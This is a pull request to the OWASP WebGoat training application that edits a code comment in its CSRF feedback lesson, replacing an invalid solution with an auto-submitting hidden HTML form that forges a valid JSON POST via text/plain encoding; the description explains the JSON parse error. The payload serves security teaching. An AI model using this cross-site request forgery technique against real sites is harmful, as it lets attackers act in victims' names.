### PR TITLE
docs(CSRFFeedback.java): fixed one invalid solution about CSRF attack

### DIFF
--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -115,10 +115,13 @@ public class CSRFFeedback implements AssignmentEndpoint {
     return false;
   }
 
-  // Solution:
-  // <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> 
-  //     <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} -->
-  //     <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
-  // </form> 
-  // <script>document.attack.submit();</script>
+/*
+ * Solution:
+ * <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> 
+ *    <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} -->
+ *    <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
+ * </form>
+ * <script>document.attack.submit();</script>
+ */
+
 }

--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -115,10 +115,10 @@ public class CSRFFeedback implements AssignmentEndpoint {
     return false;
   }
 
-  /**
-   * Solution <form name="attack" enctype="text/plain"
-   * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input
-   * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service",
-   * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script>
-   */
+  // Solution:
+  // <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> 
+  //     <!-- Construct valid JSON data: {name: "HackHuang", email: "hi#hackorg.com", subject: "service", message: "hello world="} -->
+  //     <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
+  // </form> 
+  // <script>document.attack.submit();</script>
 }

--- a/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
+++ b/src/main/java/org/owasp/webgoat/lessons/csrf/CSRFFeedback.java
@@ -117,7 +117,7 @@ public class CSRFFeedback implements AssignmentEndpoint {
 
   // Solution:
   // <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> 
-  //     <!-- Construct valid JSON data: {name: "HackHuang", email: "hi#hackorg.com", subject: "service", message: "hello world="} -->
+  //     <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} -->
   //     <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
   // </form> 
   // <script>document.attack.submit();</script>


### PR DESCRIPTION
The original solution is invalid because it constructs one request data of `{name: "Test", email: "test1233@dfssdf.de", subject: "service", message: "dsaffd"}=` which isn't valid JSON format, moreover it will cause the backend throw exception, such as `'com.fasterxml.jackson.core.JsonParseException: Unexpected character ('=' (code 61)): ......`

The original invalid solution:
```git
-  /**
-   * Solution <form name="attack" enctype="text/plain"
-   * action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> <input
-   * type="hidden" name='{"name": "Test", "email": "test1233@dfssdf.de", "subject": "service",
-   * "message":"dsaffd"}'> </form> <script>document.attack.submit();</script>
-   */
```

The new valid solution:
```git
+  // Solution:
+  // <form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST"> 
+  //     <!-- Construct valid JSON data: {name: "HackHuang", email: "email@example.com", subject: "suggestions", message: "Fixed the invalid solution="} -->
+  //     <input type="hidden" name='{"name": "HackHuang", "email": "email@example.com", "subject": "suggestions","message":"Fixed the invalid solution', value='"}'>
+  // </form> 
+  // <script>document.attack.submit();</script>
```